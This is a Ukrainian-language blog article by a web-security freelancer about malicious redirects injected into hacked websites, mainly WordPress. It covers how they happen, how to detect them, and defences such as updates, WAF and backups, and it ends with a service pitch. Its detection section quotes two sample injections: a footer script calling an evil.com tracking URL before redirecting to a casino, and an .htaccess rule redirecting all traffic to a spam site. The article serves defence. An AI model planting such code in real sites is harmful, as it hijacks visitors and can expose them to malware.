Останнім часом я все частіше стикаюся з клієнтами, чиї сайти раптово почали перенаправляти відвідувачів на підозрілі сторінки — казино, порносайти чи фейкові магазини. При цьому самі власники навіть не підозрювали про проблему, адже в адмінці та при відкритті сайту з особистого IP все «працювало нормально». Таке — класичний приклад хакерської атаки через уразливість, коли злоумисник внедрює редирект для отримання прибутку або поширення шкідливого коду.

У цій статті я детально розповім, як працюють такі атаки, чому вони небезпечні, як їх виявити та, головне — як запобігти. Ви дізнаєтеся, як боти сканують ваш сайт на пошук слабких місць, чому WordPress-проекти найчастіше в кісточці, і що робити, якщо ваш ресурс уже заражений. Будуть практичні приклади, мої особисті спостереження та конкретні кроки захисту.

Зміст статті:

Що таке редирект після взлому сайту?

Редирект після взлому — це техніка, коли хакер отримує доступ до файлів або адмін-панелі сайту та додає код, який автоматично перенаправляє відвідувачів на сторонній ресурс. Це може бути:

  • JavaScript-редирект у header або footer;

  • PHP-редирект через `header("Location: ...")`;

  • Зміна .htaccess для 301/302 редиректів;

  • Внедрення через плагіни або теми CMS (особливо в WordPress).

Як хакер отримує доступ до сайту?

Найпоширеніші шляхи:

  1. Старі версії CMS (наприклад, WordPress нижче 6.4);

  2. Плагіни з відомими уразливостями (Contact Form 7, Elementor тощо);

  3. Слабкі паролі або брутфорс через /wp-login.php;

  4. Неправильно налаштовані права доступу до файлів.

👉 Приклади:

  • Хакер знаходить старий плагін з SQL-ін'єкцією → завантажує PHP-шелл → додає редирект у functions.php.

  • Через брутфорс входить в адмінку → встановлює шкідливий плагін → активує редирект для всіх користувачів окрім IP власника.

⚡ Наприклад: у 2023 році понад 68% атак на WordPress-сайти було пов’язано з застарілими плагінами (дані Wordfence).

⚠️ Важливо: редирект часто працює тільки для «звичайних» користувачів. Якщо ви увійшли в адмінку або маєте IP з білого списку — ви його не побачите. Тому перевіряйте сайт інкогніто або через проксі!

Чому хакери використовують редиректи?

1. Заощадження на трафіку (Pay-per-click)

Кожен перехід на казино чи фармацевтичний сайт приносить хакеру від $0.05 до $2. Якщо ваш сайт має 10 000 візитів на день — це до $20 000 на місяць чистого прибутку для зловмисника.

2. Поширення шкідливого ПЗ

Як це працює:

  • Редирект веде на лендінг з «оновленням Flash Player»;

  • Користувач натискає — завантажується троян;

  • Троян краде дані, шифрує диск або додає ПК до ботнету.

3. SEO-спам і «накачка» чужих сайтів

Хакери додають приховані посилання або iframe, щоб збільшити авторитетність своїх ресурсів у Google. Ваш сайт стає частиною сітки спамних посилань.

«Це як платити за те, щоб ваш бренд використовували в шахрайських схемах. І ви навіть не знаєте».

Як виявити редирект на сайті?

Ознаки зараження

  • Автоматичний перехід на інший сайт при відкритті головної сторінки;

  • Поява підозрілих JS-скриптів у коді (наприклад, `document.location.href = "http://casino-bet[.]top"`);

  • Наявність невідомих файлів типу `shell.php`, `loader.js` у корені сайту;

  • Зміни в .htaccess без вашого відома;

  • Скарги від користувачів або блокування Google Safe Browsing.

Як перевірити сайт на редиректи?

  1. Відкрийте сайт у режимі інкогніто;

  2. Перевірте код сторінки (Ctrl+U) на наявність підозрілих скриптів;

  3. Використовуйте сервіси: Sucuri SiteCheck, VirusTotal, Google Search Console;

  4. Перегляньте останні зміни у файлах через SSH або FTP (команда `find . -type f -mtime -7`);

  5. Запустіть сканер безпеки (наприклад, Wordfence або Imunify360).

👉 Приклади:

  • Файл `footer.php` містить: <script>fetch('https://evil.com/track').then(() => window.location = 'https://casino-x.fun')</script>

  • У `.htaccess`: RewriteRule ^.*$ http://pharma-spam.net [R=301,L]

⚠️ Важливо: деякі редиректи працюють лише для певних гео-локалізацій або User-Agent. Тестуйте з різних IP!

Як захистити сайт від редиректів?

1. Регулярне оновлення CMS, плагінів та тем

Не відкладайте оновлення! Кожна нова версія виправляє уразливості. Налаштуйте автоматичні оновлення, якщо це можливо.

2. Перевірка файлів на зайвий код

Щомісяця проводьте аудит ключових файлів:

  • functions.php

  • header.php, footer.php

  • .htaccess

  • index.php

3. Використання WAF та Cloudflare

WAF (Web Application Firewall) блокує спроби ін'єкції, XSS, SQL-атаки. Cloudflare допомагає фільтрувати підозрілі запити ще до того, як вони досягнуть сервера.

4. Регулярні бекапи

Якщо сайт взломали — найшвидший спосіб відновлення — відкат до чистої резервної копії. Налаштуйте автоматичні бекапи хоча б раз на тиждень.

«Профілактика коштує дешевше, ніж відновлення після атаки».

Часто задавані питання (FAQ)

Як перевірити, чи мій сайт перенаправляє на шкідливі сайти?

Відкрийте сайт у режимі інкогніто, з мобільного інтернету або через VPN. Перевірте код сторінки та скористайтеся безкоштовними сервісами на кшталт Sucuri SiteCheck.

Чи можуть Java-проекти бути заражені редиректами?

Так, але значно рідше. Java-додатки менш схильні до таких атак, якщо немає вбудованих JavaScript-скриптів, слабких API або помилок конфігурації. Проте захист сервера та коду все одно обов’язковий.

Що робити, якщо знайшов редирект на своєму сайті?

1. Відключіть сайт тимчасово.

2. Знайдіть і видаліть шкідливий код.

3. Оновіть всі компоненти.

4. Змініть усі паролі.

5. Відновіть з чистого бекапу, якщо потрібно.

Чи допомагає HTTPS у захисті від редиректів?

Ні. HTTPS шифрує трафік, але не захищає від впровадження шкідливого коду. Хакер може додати редирект навіть на HTTPS-сайт.

Чи можна виявити редирект через Google Analytics?

Не завжди. Якщо редирект відбувається до завантаження GA-скрипта — подія не зареєструється. Краще використовувати серверні логи або спеціалізовані інструменти.

Мій досвід

⚠️ Було два випадки, коли клієнти звернулися зі скаргою: «Сайт не відкривається, але у мене все ок». Перший — WordPress-магазин з 50K візитів/місяць. Редирект працював тільки для UA-користувачів, ведучи на букмекерський сайт. Другий — корпоративний сайт, де знайшли PHP-шелл у папці /uploads. Обидва випадки — через неоновлені плагіни.

Я відновив сайти, налаштував WAF, додав регулярні бекапи та моніторинг. Тепер клієнти отримують сповіщення, якщо виявлено зміни в критичних файлах.

👉 Мораль: не чекайте, поки вас взломають. Профілактика — найкращий захист.

Висновки

Редиректи після взлому — не просто технічна неполадка, а серйозна загроза вашому бізнесу, репутації та безпеці користувачів. Хакери використовують уразливості для отримання прибутку, поширення вірусів або SEO-маніпуляцій.

Головне — не чекати атаки, а діяти заздалегідь: оновлюйте системи, контролюйте файли, використовуйте WAF і робіть бекапи.

«Боти не просто сканують файли — вони шукають жертву. І ваш сайт може бути наступним».

Готові замовити послугу?

👉 Я пропоную аудит безпеки сайту, видалення редиректів та налаштування захисту «під ключ». Напишіть мені — і я допоможу вам уникнути атаки.